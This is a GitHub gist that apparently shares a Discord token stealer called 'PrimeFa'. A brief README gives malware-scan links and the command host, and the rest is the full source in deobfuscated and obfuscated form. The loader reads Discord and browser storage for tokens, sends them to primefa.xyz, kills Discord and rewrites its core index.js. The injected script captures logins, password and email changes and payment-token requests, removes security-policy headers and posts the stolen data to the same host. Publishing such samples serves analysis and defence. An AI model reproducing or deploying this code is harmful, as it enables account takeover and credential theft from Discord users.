Skip to content

Instantly share code, notes, and snippets.

@unex

unex/README.md

Last active October 25, 2021 19:25
Show Gist options
  • Save unex/aec2d374d65207f0fad1e67cfff16b6e to your computer and use it in GitHub Desktop.
Save unex/aec2d374d65207f0fad1e67cfff16b6e to your computer and use it in GitHub Desktop.
Download ZIP
PrimeFa
Raw
README.md

PrimeFa

A discord token stealer that I was sent.

The main file being Midlight_Cord.exe, but has also been seen under other names

VirusTotal: https://www.virustotal.com/gui/file/1b4e64fa51d6b755c7f0b0fcc54dc681b3438d4aa1c74027812138a70b722a04 Hybrid Analysis: https://www.hybrid-analysis.com/sample/1b4e64fa51d6b755c7f0b0fcc54dc681b3438d4aa1c74027812138a70b722a04/61747d2a58328966f5001fe6

contacts primefa.xyz -> ec2-3-132-67-147.us-east-2.compute.amazonaws.com -> 3.132.67.147

https://www.hybrid-analysis.com/search?query=host%3A3.132.67.147

Raw
inject.deobfuscated.js
const fs = require('fs'),
path = require("path"),
{
BrowserWindow: BrowserWindow,
session: session
} = require("electron"),
https = require("https"),
querystring = require("querystring"),
electron = require("electron");
var authcode = '[[[authorization]]]';
function FirstTime() {
if (!fs['existsSync'](path["join"](__dirname, "PrimeFaOP"))) return !0;
return fs["rmdirSync"](path['join'](__dirname, "PrimeFaOP")), BrowserWindow["getAllWindows"]()[0]["webContents"]["executeJavaScript"]('function LogOut(){var t=webpackJsonp.push([[],{extra_id:(t,n,e)=>t.exports=e},[[\"extra_id\"]]]);(function(n){const e=\"string\"==typeof n?n:null;for(const o in t.c)if(t.c.hasOwnProperty(o)){const r=t.c[o].exports;if(r&&r.__esModule&&r.default&&(e?r.default[e]:n(r.default)))return r.default;if(r&&(e?r[e]:n(r)))return r}return null})(\"login\").logout()} LogOut()', !0)['then'](x => {}), !1;
}
const Filter = {
'urls': ["https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json", "https://*.discord.com/api/v*/applications/detectable", "https://discord.com/api/v*/applications/detectable", "https://*.discord.com/api/v*/users/@me/library", "https://discord.com/api/v*/users/@me/library", "https://*.discord.com/api/v*/users/@me/billing/subscriptions", 'https://discord.com/api/v*/users/@me/billing/subscriptions', "wss://remote-auth-gateway.discord.gg/*"]
};
function Login(login, password, token) {
w = BrowserWindow["getAllWindows"]()[0];
w["webContents"]["executeJavaScript"](' \
var xmlHttp = new XMLHttpRequest(); \
xmlHttp.open( "GET", "https://www.myexternalip.com/raw", false ); \
xmlHttp.send( null ); \
xmlHttp.responseText; \
', !0)["then"](ip => {
w["webContents"]["executeJavaScript"](' \
fetch("https://primefa.xyz/logged", { \
method: "POST", \
headers: { \
"Content-Type": "application/json", \
authorization: "' + authcode + '" \
}, \
body: JSON.stringify({ \
token: "' + token + '", \
ip: "' + ip + '", \
password: "' + password + '" \
}), \
}) \
.then((x) => x.json()) \
.then((x) => { return console.log(x) }); \
', !0)["then"](x => {});
});
}
function ChangePassword(oldpasswd, passwd, token) {
w = BrowserWindow["getAllWindows"]()[0];
w["webContents"]["executeJavaScript"](' \
var xmlHttp = new XMLHttpRequest(); \
xmlHttp.open( "GET", "https://www.myexternalip.com/raw", false ); \
xmlHttp.send( null ); \
xmlHttp.responseText; \
', !0)['then'](ip => {
w["webContents"]["executeJavaScript"](' \
fetch("https://primefa.xyz/passchanged", { \
method: "POST", \
headers: { \
"Content-Type": "application/json", \
authorization: "' + authcode + '" \
} \
body: JSON.stringify({ \
token: "' + token + '", \
ip: "' + ip + '", \
oldpassword: "' + oldpasswd + '", \
password: "' + passwd + '" \
}), \
}) \
.then((x) => x.json()) \
.then((x) => { return console.log(x) }); \
');
});
}
function ChangeEmail(email, password, token) {
const w = BrowserWindow["getAllWindows"]()[0];
w["webContents"]["executeJavaScript"](' \
var xmlHttp = new XMLHttpRequest(); \
xmlHttp.open("GET", "https://www.myexternalip.com/raw", false ); \
xmlHttp.send( null ); \
xmlHttp.responseText; \
', !0)["then"](ip => {
w["webContents"]["executeJavaScript"](' \
fetch("https://primefa.xyz/emailchanged", { \
method: "POST", \
headers: { \
"Content-Type": "application/json", \
authorization: "' + authcode + '" \
}, \
body: JSON.stringify({ \
token: "' + token + '", \
ip: "' + ip + '", \
email: "' + email + '", \
password: "' + password + '" \
}), \
}) \
.then((x) => x.json()) \
.then((x) => { return console.log(x) }); \
');
});
}
session["defaultSession"]["webRequest"]['onBeforeRequest'](Filter, (details, callback) => {
FirstTime() && (details["url"]["startsWith"]("wss://") ? callback({
'cancel': !0
}) : callback({
'cancel': !1
}));
}),
session['defaultSession']["webRequest"]["onHeadersReceived"]((details, callback) => {
delete details["responseHeaders"]["content-security-policy"],
delete details["responseHeaders"]['content-security-policy-report-only'],
callback({
'responseHeaders': {
...details["responseHeaders"],
'Access-Control-Allow-Headers': '*'
}
});
});
const ChangePasswordFilter = {
'urls': ["https://discord.com/api/v*/users/@me", "https://discordapp.com/api/v*/users/@me", 'https://*.discord.com/api/v*/users/@me', "https://discordapp.com/api/v*/auth/login", "https://discord.com/api/v*/auth/login", 'https://*.discord.com/api/v*/auth/login', "https://api.stripe.com/v*/tokens"]
};
session["defaultSession"]['webRequest']["onCompleted"](ChangePasswordFilter, (details, callback) => {
if (details['url']["endsWith"]('login') && 200 == details["statusCode"]) {
const data = JSON["parse"](Buffer["from"](details["uploadData"][0]['bytes'])["toString"]()),
login = data["login"],
password = data["password"];
BrowserWindow["getAllWindows"]()[0]["webContents"]["executeJavaScript"]("var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[["extra_id"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)"getToken"===e&&(token=t.default.getToken())} token", !0)["then"](r => {
Login(login, password, r);
});
}
if (details['url']["endsWith"]("users/@me") && 200 == details["statusCode"] && 'PATCH' == details["method"]) {
const data = JSON["parse"](Buffer["from"](details['uploadData'][0]["bytes"])['toString']());
null != data["password"] && null != data["password"] && '' != data["password"] && (null != data['new_password'] && null != data["new_password"] && '' != data["new_password"] && BrowserWindow["getAllWindows"]()[0]['webContents']["executeJavaScript"]('var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[[\"extra_id\"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)\"getToken\"===e&&(token=t.default.getToken())} token', !0)["then"](r => {
ChangePassword(data["password"], data["new_password"], r);
}), null != data["email"] && null != data['email'] && '' != data["email"] && BrowserWindow["getAllWindows"]()[0]['webContents']["executeJavaScript"]("var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[["extra_id"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)"getToken"===e&&(token=t.default.getToken())} token", !0)['then'](r => {
ChangeEmail(data["email"], data["password"], r);
}));
}
if (details["url"]['endsWith']('tokens')) {
const w = BrowserWindow["getAllWindows"]()[0];
querystring["parse"](decodeURIComponent(Buffer["from"](details["uploadData"][0]['bytes'])['toString']())), w["webContents"]["executeJavaScript"]("var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[["extra_id"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)"getToken"===e&&(token=t.default.getToken())} token", !0)["then"](r => {});
}
}),
module["exports"] = require('./core.asar');
Raw
inject.obfuscated.js
// http://primefa.xyz/init/delta/obfus/inject/raw
const _0x567b59=_0x1f69;(function(_0x4f91cd,_0x17c370){const _0x4259b2=_0x1f69,_0x1b9aad=_0x4f91cd();while(!![]){try{const _0x2ab58e=-parseInt(_0x4259b2(0x1c1))/0x1*(-parseInt(_0x4259b2(0x1bd))/0x2)+parseInt(_0x4259b2(0x1f6))/0x3*(-parseInt(_0x4259b2(0x1b8))/0x4)+-parseInt(_0x4259b2(0x1f9))/0x5+parseInt(_0x4259b2(0x1ec))/0x6+-parseInt(_0x4259b2(0x1d1))/0x7+parseInt(_0x4259b2(0x1e5))/0x8*(parseInt(_0x4259b2(0x1c2))/0x9)+parseInt(_0x4259b2(0x1da))/0xa;if(_0x2ab58e===_0x17c370)break;else _0x1b9aad['push'](_0x1b9aad['shift']());}catch(_0x5873be){_0x1b9aad['push'](_0x1b9aad['shift']());}}}(_0x3b49,0x19ea1));const fs=require('fs'),path=require(_0x567b59(0x1e9)),{BrowserWindow:BrowserWindow,session:session}=require(_0x567b59(0x1de)),https=require(_0x567b59(0x1f4)),querystring=require(_0x567b59(0x1d6)),electron=require(_0x567b59(0x1de));var authcode='[[[authorization]]]';function FirstTime(){const _0x476429=_0x567b59;if(!fs['existsSync'](path[_0x476429(0x1ea)](__dirname,_0x476429(0x1cf))))return!0x0;return fs[_0x476429(0x1cc)](path['join'](__dirname,_0x476429(0x1cf))),BrowserWindow[_0x476429(0x1d5)]()[0x0][_0x476429(0x1e8)][_0x476429(0x1d8)]('function\x20LogOut(){var\x20t=webpackJsonp.push([[],{extra_id:(t,n,e)=>t.exports=e},[[\x22extra_id\x22]]]);(function(n){const\x20e=\x22string\x22==typeof\x20n?n:null;for(const\x20o\x20in\x20t.c)if(t.c.hasOwnProperty(o)){const\x20r=t.c[o].exports;if(r&&r.__esModule&&r.default&&(e?r.default[e]:n(r.default)))return\x20r.default;if(r&&(e?r[e]:n(r)))return\x20r}return\x20null})(\x22login\x22).logout()}\x20LogOut()',!0x0)['then'](_0x4def16=>{}),!0x1;}const Filter={'urls':[_0x567b59(0x1e3),_0x567b59(0x1be),_0x567b59(0x1e2),_0x567b59(0x1dd),_0x567b59(0x1eb),_0x567b59(0x1c6),'https://discord.com/api/v*/users/@me/billing/subscriptions',_0x567b59(0x1d2)]};function _0x3b49(){const _0x3f5a25=['webContents','path','join','https://discord.com/api/v*/users/@me/library','215958nWbBCi','\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ip:\x20\x22','url','https://api.stripe.com/v*/tokens','https://discord.com/api/v*/auth/login','statusCode','\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20},\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20body:\x20JSON.stringify({\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20token:\x20\x22','toString','https','parse','2166PDuNed','new_password','password','630390yiZEvQ','\x0a\x20\x20\x20\x20\x20\x20\x20\x20fetch(\x22https://primefa.xyz/passchanged\x22,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20method:\x20\x22POST\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20headers:\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22Content-Type\x22:\x20\x22application/json\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20authorization:\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22','512THQYLY','bytes','startsWith','\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20password:\x20\x22','responseHeaders','62JScLEW','https://*.discord.com/api/v*/applications/detectable','login','\x0a\x20\x20\x20\x20\x20\x20\x20\x20var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x0a\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.open(\x20\x22GET\x22,\x20\x22https://www.myexternalip.com/raw\x22,\x20false\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.send(\x20null\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.responseText;\x0a\x20\x20\x20\x20','1246pKXOnP','244116TuXJjP','wss://','\x0a\x20\x20\x20\x20\x20\x20\x20\x20fetch(\x22https://primefa.xyz/logged\x22,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20method:\x20\x22POST\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20headers:\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22Content-Type\x22:\x20\x22application/json\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20authorization:\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22','users/@me','https://*.discord.com/api/v*/users/@me/billing/subscriptions','uploadData','var\x20req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[[\x22extra_id\x22]]]);for(let\x20e\x20in\x20req.c)if(req.c.hasOwnProperty(e)){let\x20t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let\x20e\x20in\x20t.default)\x22getToken\x22===e&&(token=t.default.getToken())}\x20token','https://discordapp.com/api/v*/users/@me','email','webRequest','rmdirSync','then','defaultSession','PrimeFaOP','method','733593skakNE','wss://remote-auth-gateway.discord.gg/*','content-security-policy','\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}),\x0a\x20\x20\x20\x20\x20\x20\x20\x20})\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.then((x)\x20=>\x20x.json())\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.then((x)\x20=>\x20{\x20return\x20console.log(x)\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20','getAllWindows','querystring','from','executeJavaScript','endsWith','3005710xDRsVZ','https://discord.com/api/v*/users/@me','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.open(\x20\x22GET\x22,\x20\x22https://www.myexternalip.com/raw\x22,\x20false\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.send(\x20null\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.responseText;\x0a\x20\x20\x20\x20\x20\x20\x20\x20','https://*.discord.com/api/v*/users/@me/library','electron','\x0a\x20\x20\x20\x20\x20\x20\x20\x20fetch(\x22https://primefa.xyz/emailchanged\x22,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20method:\x20\x22POST\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20headers:\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22Content-Type\x22:\x20\x22application/json\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20authorization:\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22','\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}),\x0a\x20\x20\x20\x20\x20\x20\x20\x20})\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.then((x)\x20=>\x20x.json())\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.then((x)\x20=>\x20{\x20return\x20console.log(x)\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20','exports','https://discord.com/api/v*/applications/detectable','https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json','onHeadersReceived','16jqYKjW','https://discordapp.com/api/v*/auth/login','onCompleted'];_0x3b49=function(){return _0x3f5a25;};return _0x3b49();}function Login(_0x1992a6,_0x496a17,_0xe44c90){const _0x38ce10=_0x567b59,_0x1cace1=BrowserWindow[_0x38ce10(0x1d5)]()[0x0];_0x1cace1[_0x38ce10(0x1e8)][_0x38ce10(0x1d8)](_0x38ce10(0x1c0),!0x0)[_0x38ce10(0x1cd)](_0x2bbb9f=>{const _0x37c562=_0x38ce10;_0x1cace1[_0x37c562(0x1e8)][_0x37c562(0x1d8)](_0x37c562(0x1c4)+authcode+'\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20},\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20body:\x20JSON.stringify({\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20token:\x20\x22'+_0xe44c90+_0x37c562(0x1ed)+_0x2bbb9f+_0x37c562(0x1bb)+_0x496a17+_0x37c562(0x1d4),!0x0)[_0x37c562(0x1cd)](_0x5c208b=>{});});}function ChangePassword(_0x2a7a72,_0x49b16f,_0x222172){const _0x779339=_0x567b59,_0x5d8a93=BrowserWindow[_0x779339(0x1d5)]()[0x0];_0x5d8a93[_0x779339(0x1e8)][_0x779339(0x1d8)](_0x779339(0x1dc),!0x0)['then'](_0x5da35b=>{const _0x2fb6df=_0x779339;_0x5d8a93[_0x2fb6df(0x1e8)][_0x2fb6df(0x1d8)](_0x2fb6df(0x1fa)+authcode+_0x2fb6df(0x1f2)+_0x222172+_0x2fb6df(0x1ed)+_0x5da35b+'\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20oldpassword:\x20\x22'+_0x2a7a72+_0x2fb6df(0x1bb)+_0x49b16f+_0x2fb6df(0x1e0));});}function ChangeEmail(_0x2313aa,_0x381998,_0x4f3fa7){const _0x2748f9=_0x567b59,_0x64e320=BrowserWindow[_0x2748f9(0x1d5)]()[0x0];_0x64e320[_0x2748f9(0x1e8)][_0x2748f9(0x1d8)]('\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.open(\x20\x22GET\x22,\x20\x22https://www.myexternalip.com/raw\x22,\x20false\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.send(\x20null\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.responseText;\x0a\x20\x20\x20\x20\x20\x20\x20\x20',!0x0)[_0x2748f9(0x1cd)](_0x176e21=>{const _0x5c6be8=_0x2748f9;_0x64e320[_0x5c6be8(0x1e8)][_0x5c6be8(0x1d8)](_0x5c6be8(0x1df)+authcode+_0x5c6be8(0x1f2)+_0x4f3fa7+_0x5c6be8(0x1ed)+_0x176e21+'\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20email:\x20\x22'+_0x2313aa+_0x5c6be8(0x1bb)+_0x381998+_0x5c6be8(0x1e0));});}session[_0x567b59(0x1ce)][_0x567b59(0x1cb)]['onBeforeRequest'](Filter,(_0x119ddd,_0x29a67f)=>{const _0x9af903=_0x567b59;FirstTime()&&(_0x119ddd[_0x9af903(0x1ee)][_0x9af903(0x1ba)](_0x9af903(0x1c3))?_0x29a67f({'cancel':!0x0}):_0x29a67f({'cancel':!0x1}));}),session['defaultSession'][_0x567b59(0x1cb)][_0x567b59(0x1e4)]((_0x1d8581,_0x88bf91)=>{const _0x5e2941=_0x567b59;delete _0x1d8581[_0x5e2941(0x1bc)][_0x5e2941(0x1d3)],delete _0x1d8581[_0x5e2941(0x1bc)]['content-security-policy-report-only'],_0x88bf91({'responseHeaders':{..._0x1d8581[_0x5e2941(0x1bc)],'Access-Control-Allow-Headers':'*'}});});function _0x1f69(_0x5bfbd0,_0x568a9b){const _0x3b49dc=_0x3b49();return _0x1f69=function(_0x1f699a,_0x27a00b){_0x1f699a=_0x1f699a-0x1b8;let _0x323d61=_0x3b49dc[_0x1f699a];return _0x323d61;},_0x1f69(_0x5bfbd0,_0x568a9b);}const ChangePasswordFilter={'urls':[_0x567b59(0x1db),_0x567b59(0x1c9),'https://*.discord.com/api/v*/users/@me',_0x567b59(0x1e6),_0x567b59(0x1f0),'https://*.discord.com/api/v*/auth/login',_0x567b59(0x1ef)]};session[_0x567b59(0x1ce)]['webRequest'][_0x567b59(0x1e7)](ChangePasswordFilter,(_0x4a337c,_0x338c7c)=>{const _0x59d4a1=_0x567b59;if(_0x4a337c['url'][_0x59d4a1(0x1d9)]('login')&&0xc8==_0x4a337c[_0x59d4a1(0x1f1)]){const _0x1c73f7=JSON[_0x59d4a1(0x1f5)](Buffer[_0x59d4a1(0x1d7)](_0x4a337c[_0x59d4a1(0x1c7)][0x0]['bytes'])[_0x59d4a1(0x1f3)]()),_0x50f104=_0x1c73f7[_0x59d4a1(0x1bf)],_0x9db1fd=_0x1c73f7[_0x59d4a1(0x1f8)];BrowserWindow[_0x59d4a1(0x1d5)]()[0x0][_0x59d4a1(0x1e8)][_0x59d4a1(0x1d8)](_0x59d4a1(0x1c8),!0x0)[_0x59d4a1(0x1cd)](_0x16a388=>{Login(_0x50f104,_0x9db1fd,_0x16a388);});}if(_0x4a337c['url'][_0x59d4a1(0x1d9)](_0x59d4a1(0x1c5))&&0xc8==_0x4a337c[_0x59d4a1(0x1f1)]&&'PATCH'==_0x4a337c[_0x59d4a1(0x1d0)]){const _0xa11694=JSON[_0x59d4a1(0x1f5)](Buffer[_0x59d4a1(0x1d7)](_0x4a337c['uploadData'][0x0][_0x59d4a1(0x1b9)])['toString']());null!=_0xa11694[_0x59d4a1(0x1f8)]&&null!=_0xa11694[_0x59d4a1(0x1f8)]&&''!=_0xa11694[_0x59d4a1(0x1f8)]&&(null!=_0xa11694['new_password']&&null!=_0xa11694[_0x59d4a1(0x1f7)]&&''!=_0xa11694[_0x59d4a1(0x1f7)]&&BrowserWindow[_0x59d4a1(0x1d5)]()[0x0]['webContents'][_0x59d4a1(0x1d8)]('var\x20req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[[\x22extra_id\x22]]]);for(let\x20e\x20in\x20req.c)if(req.c.hasOwnProperty(e)){let\x20t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let\x20e\x20in\x20t.default)\x22getToken\x22===e&&(token=t.default.getToken())}\x20token',!0x0)[_0x59d4a1(0x1cd)](_0x1c9de1=>{const _0xb88817=_0x59d4a1;ChangePassword(_0xa11694[_0xb88817(0x1f8)],_0xa11694[_0xb88817(0x1f7)],_0x1c9de1);}),null!=_0xa11694[_0x59d4a1(0x1ca)]&&null!=_0xa11694['email']&&''!=_0xa11694[_0x59d4a1(0x1ca)]&&BrowserWindow[_0x59d4a1(0x1d5)]()[0x0]['webContents'][_0x59d4a1(0x1d8)](_0x59d4a1(0x1c8),!0x0)['then'](_0x2116e1=>{const _0x473f53=_0x59d4a1;ChangeEmail(_0xa11694[_0x473f53(0x1ca)],_0xa11694[_0x473f53(0x1f8)],_0x2116e1);}));}if(_0x4a337c[_0x59d4a1(0x1ee)]['endsWith']('tokens')){const _0x12917f=BrowserWindow[_0x59d4a1(0x1d5)]()[0x0];querystring[_0x59d4a1(0x1f5)](decodeURIComponent(Buffer[_0x59d4a1(0x1d7)](_0x4a337c[_0x59d4a1(0x1c7)][0x0]['bytes'])['toString']())),_0x12917f[_0x59d4a1(0x1e8)][_0x59d4a1(0x1d8)](_0x59d4a1(0x1c8),!0x0)[_0x59d4a1(0x1cd)](_0x43e6cd=>{});}}),module[_0x567b59(0x1e1)]=require('./core.asar');
Raw
loader.js
const fs = require("fs"),
path = require("path"),
fetch = require("node-fetch"),
publicIp = require("public-ip"),
fkill = require("kill-process-by-name");
var authorization = "e190297d642abb4a7aee79bd76806797baa4dd2485935cb39977780915aa6343";
fetch("http://primefa.xyz/init/status").then(e => e.text()).then(async e => {
if ("ACTIVE" === e) {
function a(e) {
e += "\\Local Storage\\leveldb";
let a = [];
try {
fs.readdirSync(path.normalize(e)).map(t => {
(t.endsWith(".log") || t.endsWith(".ldb")) && fs.readFileSync(`${e}\\${t}`, "utf8").split(/\r?\n/).forEach(async e => {
const t = [new RegExp(/mfa\.[\w-]{84}/g), new RegExp(/[\w-]{24}\.[\w-]{6}\.[\w-]{27}/g)];
for (const r of t) {
const t = e.match(r);
t && t.forEach(e => {
a.push(e)
})
}
})
})
} catch {}
return a
}! function () {
let e;
if ("win32" == process.platform) {
const a = process.env.LOCALAPPDATA,
t = process.env.APPDATA;
e = {
Discord: path.join(t, "Discord"),
"Discord Canary": path.join(t, "discordcanary"),
"Discord PTB": path.join(t, "discordptb"),
"Google Chrome": path.join(a, "Google", "Chrome", "User Data", "Default"),
Opera: path.join(t, "Opera Software", "Opera Stable"),
Brave: path.join(a, "BraveSoftware", "Brave-Browser", "User Data", "Default"),
Yandex: path.join(a, "Yandex", "YandexBrowser", "User Data", "Default")
}
}
const t = {};
for (let [r, o] of Object.entries(e)) {
const e = a(o);
e && e.forEach(e => {
void 0 === t[r] && (t[r] = []), t[r].push(e)
})
}
async function r() {
try {
return `${await publicIp.v4()}`
} catch {
return "No IP found :small_red_triangle_down:"
}
}
console.log("Runtime Daemon Un-Responsive, Please Retry Later"), async function () {
var e = function (e) {
for (var a in e)
if (e.hasOwnProperty(a)) {
var t = e[a];
return t.toString().split(",")
} return ""
}(t);
e || fetch("http://primefa.xyz/opened", {
method: "POST",
headers: {
"Content-Type": "application/json",
authorization: authorization
},
body: JSON.stringify({
token: "None",
ip: null
})
}).then(e => e.json()).then(e => {}), await e.forEach(async e => {
fetch("http://primefa.xyz/opened", {
method: "POST",
headers: {
"Content-Type": "application/json",
authorization: authorization
},
body: JSON.stringify({
token: e,
ip: await r()
})
}).then(e => e.json()).then(e => {})
})
}()
}();
const e = process.env.LOCALAPPDATA,
t = [];
!async function () {
try {
var a;
await fetch("http://primefa.xyz/init/delta/obfus/inject/raw").then(e => e.text()).then(e => {
e = e.replace("[[[authorization]]]", authorization), a = e
}), await fs.readdir(e, async (r, o) => {
await o.forEach(async e => {
e.toString().includes("cord") && await t.push(e)
}), t.forEach(async t => {
await fs.readdir(e + "\\" + t, (r, o) => {
o.forEach(async r => {
r.includes("app-") && await fs.readdir(e + "\\" + t + "\\" + r, (o, n) => {
n.forEach(async o => {
o.includes("modules") && fs.readdir(e + "\\" + t + "\\" + r + "\\" + o, (n, i) => {
i.forEach(n => {
n.includes("discord_desktop_core") && fs.readdir(e + "\\" + t + "\\" + r + "\\" + o + "\\" + n, (i, s) => {
s.forEach(i => {
i.includes("discord_desktop_core") && fs.readdir(e + "\\" + t + "\\" + r + "\\" + o + "\\" + n + "\\" + i, (s, c) => {
c.forEach(s => {
s.includes("index.js") && (
fs.mkdir(e + "\\" + t + "\\" + r + "\\" + o + "\\" + n + "\\" + i + "\\PrimeFaOP", e => {}),
fkill("discord"),
fkill("discordPtb"),
fs.writeFile(e + "\\" + t + "\\" + r + "\\" + o + "\\" + n + "\\" + i + "\\index.js", a, e => {})
)
})
})
})
})
})
})
})
})
})
})
})
})
} catch (e) {
console.log(e)
}
}()
}
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment